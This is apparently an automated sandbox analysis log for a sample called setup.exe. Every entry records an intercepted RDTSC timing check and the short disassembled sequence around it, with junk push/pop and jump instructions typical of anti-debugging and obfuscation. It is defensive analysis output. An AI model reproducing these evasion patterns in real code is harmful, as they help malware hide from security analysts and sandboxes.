                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F0366 second address: 5F0377 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F808D280526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F0377 second address: 5F037D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F0778 second address: 5F077D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F077D second address: 5F0783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F0783 second address: 5F0793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jl 00007F808D28052Eh 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F090F second address: 5F0913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F0913 second address: 5F0926 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b ja 00007F808D280526h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F0A7B second address: 5F0A98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 jmp 00007F808D4B80C6h 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F0A98 second address: 5F0AA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F0AA0 second address: 5F0AA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F0AA4 second address: 5F0ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F808D280531h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e js 00007F808D280532h 0x00000014 ja 00007F808D28052Ah 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F0E78 second address: 5F0EA2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F808D4B80C3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F808D4B80C1h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5FBCCB second address: 5FBCD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5FBE37 second address: 5FBE4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 je 00007F808D4B80B6h 0x0000000d pop ecx 0x0000000e popad 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5FBE4B second address: 5FBE4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5FC157 second address: 5FC15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5FC15D second address: 5FC161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5FC161 second address: 5FC16D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F808D4B80B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5FC83E second address: 5FC842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5FC842 second address: 5FC85C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C0h 0x00000007 jo 00007F808D4B80B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5FC85C second address: 5FC861 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5FC861 second address: 5FC879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F808D4B80BCh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5FCB7E second address: 5FCB82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5FD9E0 second address: 5FD9EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F808D4B80B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 602852 second address: 60286B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F808D28052Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 60286B second address: 60286F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 60286F second address: 602895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F808D280537h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6026CA second address: 6026CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6064EC second address: 60650B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D28052Bh 0x00000007 je 00007F808D280526h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F808D280526h 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 606655 second address: 60665F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F808D4B80B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 60665F second address: 606668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54761B second address: 54761F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54761F second address: 547623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 60A593 second address: 60A5AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C2h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 60A5AB second address: 60A5B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 60A5B3 second address: 60A5B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 616615 second address: 616626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D28052Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 616626 second address: 61663E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 jmp 00007F808D4B80BEh 0x0000000e pop eax 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6191C3 second address: 6191CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 627533 second address: 627539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 627539 second address: 627543 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F808D280526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 627543 second address: 627552 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F808D4B80BAh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 627552 second address: 627558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6308CF second address: 6308D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6308D5 second address: 6308EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F808D28052Dh 0x0000000c pop esi 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 62F30B second address: 62F311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 62F44E second address: 62F452 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 62F452 second address: 62F45E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 62F45E second address: 62F462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 62F893 second address: 62F8AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80C3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6345D8 second address: 6345DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6345DE second address: 6345E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 634155 second address: 634159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6342EC second address: 6342F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6342F2 second address: 6342F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6342F6 second address: 6342FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6342FF second address: 634305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64AB67 second address: 64AB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80BFh 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64785F second address: 647863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 545B62 second address: 545B78 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F808D4B80B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F808D4B80B6h 0x00000015 popad 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 545B78 second address: 545B84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F808D280526h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 545B84 second address: 545B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 657579 second address: 65757E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 670290 second address: 6702A0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F808D4B80BCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 670D98 second address: 670DAA instructions: 0x00000000 rdtsc 0x00000002 jns 00007F808D280526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b js 00007F808D280526h 0x00000011 pop ebx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 670F38 second address: 670F42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F808D4B80B6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 672A27 second address: 672A3D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F808D280532h 0x0000000e jc 00007F808D280526h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 675A7A second address: 675A95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 675A95 second address: 675AA8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F808D280528h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 675AA8 second address: 675ABF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 676EEA second address: 676EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 676EF0 second address: 676F03 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F808D4B80B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jo 00007F808D4B80B6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 678843 second address: 678847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 678847 second address: 67884B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 67884B second address: 678851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 678851 second address: 67885C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 67885C second address: 678893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F808D280536h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F808D280537h 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 678893 second address: 67889D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 67889D second address: 6788B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D280534h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6788B5 second address: 6788BB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AD0CD3 second address: 4AD0CD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AD0CD9 second address: 4AD0CEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D4B80BFh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AD0CEC second address: 4AD0CF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AD0CF0 second address: 4AD0D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F808D4B80C1h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AD0D0C second address: 4AD0D12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AD0D12 second address: 4AD0D8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007F808D4B80C6h 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 mov eax, 4380CE4Dh 0x0000001b mov ch, 02h 0x0000001d popad 0x0000001e pop ebp 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F808D4B80BBh 0x00000026 and cx, 3FFEh 0x0000002b jmp 00007F808D4B80C9h 0x00000030 popfd 0x00000031 pushad 0x00000032 jmp 00007F808D4B80BEh 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC0D1A second address: 4AC0D3C instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F808D280537h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC0D3C second address: 4AC0D54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D4B80C4h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC0D54 second address: 4AC0D58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC0D58 second address: 4AC0D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a call 00007F808D4B80BDh 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 mov cl, bh 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F808D4B80C5h 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B00719 second address: 4B0071D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B0071D second address: 4B00721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B00721 second address: 4B00727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B00727 second address: 4B0072D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B0072D second address: 4B00761 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D28052Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F808D280530h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F808D28052Eh 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B00761 second address: 4B00767 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B00767 second address: 4B0076B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B0076B second address: 4B0076F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AA010B second address: 4AA010F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AA010F second address: 4AA0113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AA0113 second address: 4AA0119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AA0119 second address: 4AA0136 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, 6A154446h 0x00000012 popad 0x00000013 rdtsc
